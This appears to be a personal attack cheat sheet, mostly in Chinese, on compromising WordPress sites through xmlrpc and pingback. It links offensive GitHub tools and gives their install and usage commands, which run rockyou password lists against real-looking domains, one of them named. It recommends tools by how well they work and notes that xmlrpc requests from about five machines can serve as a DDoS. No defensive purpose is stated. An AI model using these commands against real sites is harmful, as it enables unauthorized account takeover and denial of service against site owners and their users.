WordPress Pingback Attack

https://github.com/FireFart/WordpressPingbackPortScanner   太老

https://github.com/n00py/WPForce    使用python2.7 使用apt-get install python2.7 然后安装pip install 2to3

然后2to3 -w wpforce.py

使用方法python2.7 wpforce.py -i usr.txt -w ./root/rockyou.txt -u "https://www.xxx.fr"

https://github.com/aress31/xmlrpc-bruteforcer

python xmlrpc-bruteforcer.py -u admin4572 -w /root/wpscan/rockyou.txt -t 3 -x https://www.oserinvestir.fr/xmlrpc.php
可以用于压力攻击ddos 发送大概1M的数据请求，如果使用5台机器可达到攻击效果
https://github.com/relarizky/wpxploit 效果好很推荐推荐按
$ git clone https://github.com/relarizky/wpxploit.git
$ cd wpxploit
$ pip3 install -r requirements.txt
$ ./exploit.py
./exploit.py https://www.xxx.fr/ 5 15
https://github.com/exploit-inters/CMS-Attack 比较推荐
需要下载rockyou.txt字典替换原来data下数据用户名和密码，然后nano setting.json 设置代理
https://github.com/Moham3dRiahi/XAttacker

git clone https://github.com/Moham3dRiahi/XAttacker.gitcd XAttacker
perl XAttacker.pl